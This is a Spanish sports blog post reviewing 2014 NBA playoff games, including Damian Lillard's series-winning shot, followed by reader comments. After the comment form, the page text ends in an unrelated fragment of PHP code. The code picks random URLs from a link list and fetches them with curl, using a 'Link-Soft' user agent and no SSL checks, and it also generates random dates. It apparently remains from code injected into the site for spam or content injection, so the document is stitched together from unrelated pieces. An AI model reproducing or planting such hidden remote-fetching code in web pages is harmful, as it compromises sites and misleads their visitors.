La crónica: The biggest shot

03 de May de 2014 por TheDeerHunter

Tan sólo 9 décimas nos privaron de otra eliminatoria a 7 más, la que hubiera sido la sexta en la primera ronda más apasionante e igualada de la historia.

Genialidad increíble de Damian Lillard en su primera postemporada. La jugada es para revisionarla una y otra vez. Con 2 abajo en el marcador, en lo quecualquiera tarda en pestañear Lillard arranca a correr desde el lateral opuesto al saque de banda y le gana una mínima ventaja a Parsons, aplaude fuerte para llamar la atención de Batum quien se la da un metro alejado de la línea de triple. Aún salta Lillard en un ligero fadeaway, con el tiempo justo para recibir y lanzar. Parábola perfecta. Bang!

Los Blazers superan una eliminatoria por primera vez en 14 años. Según el propio Lillard “el tiro más grandioso de su vida”. Sin duda debemos creerle. Canastones parecidos en la regular ya le hemos visto meter unos cuantos. Despedida trágicamente cruel para los Rockets. Ayer pudo ser el día en el que menos merecían perder. Harden por fin se expolsó la defensa de Matthews y estuvo a la altura de lo que se le exige. Howard en su gran línea de esta serie. Diferencias de un único punto en cada uno de los cuartos, y así hubiera sido también el último de no ser por esas 9 décimas. Sólo los playoffs ofrecen un momento mágico de esta naturaleza.

En el American Airlines de Dallas asistimos a otra obra de arte confeccionada por Spurs y Mavericks. Deberían pensar una versión extendida a 15 o 25 partidos en según que casos, porque no queremos que se acabe. Otra vez juego preciosista, 12 hombres en dobles figuras en un intercambio de golpes espectacular, y otra vez un final de infarto. ¿Qué más se puede pedir a un partido de baloncesto?

Los Mavs salieron enrabietados clavando 34 en el primer cuarto. Sin inmutarse los Spurs les ponían contra las cuerdas en el tercero, “secándoles” en 18 puntos. No obstante el último fue el apogeo con ambos por encima de los 30 puntos. Monta imparable, junto a un Nowitzki tan determinante como antaño. Pero los Spurs no se rindieron y un error del propio Ellis les iba a dejar con opción de empatar o ganar a falta de 1′. La jugada, para Mills, no fue resuelta tan bien como la de los Blazers y habrá séptimo. ¿Alguien sabría encontrar otra diferencia más entre el Este y el Oeste relativa al primer cruce de sus cabezas de serie? En fin, para esto Popovich ha estado inventando alquimia de minutos todo el año.

Por último, los Nets no dieron demasiadas opciones a los Raptors en Brooklyn y también habrá ese séptimo que teóricamente es tan favorable para ellos. Esta vez sólo DeRozan plantó cara. Deron Williams volvió a superar a Lowry en su duelo particular y estuvo bien arropado por Joe Johnson y los ex-Celtics. Ahora hace falta que impongan su veteranía en Toronto.

PREMIOS

MVP: Estuvo hiperactivo Lamarcus Aldridge nuevamente sosteniendo a su equipo con 30 puntos, 12 rebotes y 2 asistencias pero no anduvo tan fino anotando en juego. El artista ayer fue Damian Lillard, que pasa a la historia con una de las mejores canastas ganadoras que hayamos visto. 25 puntos, 6 rebotes, 3 asistencias, 3 robos y 1 tapón. Mucho más que un único buzzer beater.

Sorpresa: DeJuan Blair está empeñado en ajustar cuentas. Ciertamente no terminamos de entender qué es lo que ocurrió en su caso. Anoche en 29 minutos 10 puntos, pero 14 rebotes y 4 robos. Hipermotivadísimo. ¿Una mancha en el expediente de Popovich?

Decepción: Kyle Lowry, superado por las circunstancias. Falló 12 de sus 16 lanzamientos y perdió 4 balones. Noche para olvidar que le costó demasiado caro a su equipo. Determinado perfil de jugadores no se pueden permitir el lujo de fallar en los momentos más críticos. Flojo partido también de Manu Ginobili, por cierto, fallando todos sus triples y la mayoría de sus intentos.

Esfuerzo en vano: Grande DeMar DeRozan, que aparentemente ha dejado atrás la presión del primer partido. En cualquier caso el mejor fue James Harden, imparable con 34 puntos en una serie de 9 de 15 y 12 de 12 en tiros libres, 6 asistencias, 4 rebotes, 4 robos… ¡Ay si hubiera encontrado este camino mucho antes en la eliminatoria!

 

Comenta

7 comentarios a esta entrada

  1. underlock dice:
    #1

    Increíble Lillard, estamos hablando de un sophomore y juega como un veterano, jugón.

    Yo sólo llevo unos 8 años siguiendo la NBA, pero dudo mucho que en la historia haya habido una primera ronda como la de este año, brutal.

      Citar

  2. sabas dice:
    #2

    Sin quitar merito al canaston, valla mierda de defensa. ¿Pero quien creían que se la iba a jugar?

      Citar

  3. Esteban dice:
    #3

    underlock:
    Increíble Lillard, estamos hablando de un sophomore y juega como un veterano, jugón.

    Es cierto que Lillard es un sohpomore, pero en dos meses cumple 24 años, no es ningun chiquillo y eso se nota

      Citar

  4. Viva_Dirk dice:
    #4

    Lillard tiene un techo enorme, es una fuente inagotable de talento en ataque y tiene ese instinto depredador en los momentos finales. El y LaMarcus pueden ser una pareja histórica si se mantienen juntos, con o sin títulos.

    La serie ha sido preciosa, ultraigualada, con una gran versión de Howard y un Harden que a mi no termina de convencerme. Los Blazers molan, aunque tienen realmente poco banco, Mo Williams es el único recambio exterior y Thomas Robinson el único interior.

      Citar

  5. Esteban dice:
    #5

    Viva_Dirk:
    Lillard tiene un techo enorme, es una fuente inagotable de talento en ataque y tiene ese instinto depredador en los momentos finales. El y LaMarcus pueden ser una pareja histórica si se mantienen juntos, con o sin títulos.

    La serie ha sido preciosa, ultraigualada, con una gran versión de Howard y un Harden que a mi no termina de convencerme. Los Blazers molan, aunque tienen realmente poco banco, Mo Williams es el único recambio exterior y Thomas Robinson el único interior.

    si este año se esperaba que Wright y Mccollun le dieran mas profunidad a su segunda unidad, cosa que finalmente no paso

    es extraño que tiendo una buena situacion salarial, los despeachos no hayan movido un pelo en elo mercado, para conseguir algun perimetral que les ayude

      Citar

  6. Ruxixon dice:
    #6

    Vaya dos redenciones las de Howard (ya hablé mucho de él) y Monta Ellis,éste,a pesar de la cagada final.En su caso además se nota el entorno,un equipo competitivo y un entrenador como la copa de un pino.Si podeís ver su último cuarto fue una gozada verle penetrar continuamente y elevarse sobre unos muelles invisibles para conseguir anotar.

    A mí Harden me ha confundido desde que se fue a Houston,creo que en mi cabeza había una proyección de jugador que no se ajusta a sus características,más que nada porque no lo veo un caníbal de esto,un líder en su equipo.

    Chicago KO,Houston KO….se va cumpliendo la profecía “Carmelo Trade”.

      Citar

  7. Jose Luis dice:
    #7

    Muy de acuerdo con Ruxixon en lo de Ellis, para mi ha pasado de ser un tirapiedras hinchanúmeros a ser un jugador bastante fiable como segundo espada. Siempre tendrá algunos partidos con muy mal porcentaje, es escolta y bajito, pero oye, verle penetrar y driblar es un lujo, y en PO está dando la cara.

    Gran cambio de imagen de Monta.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>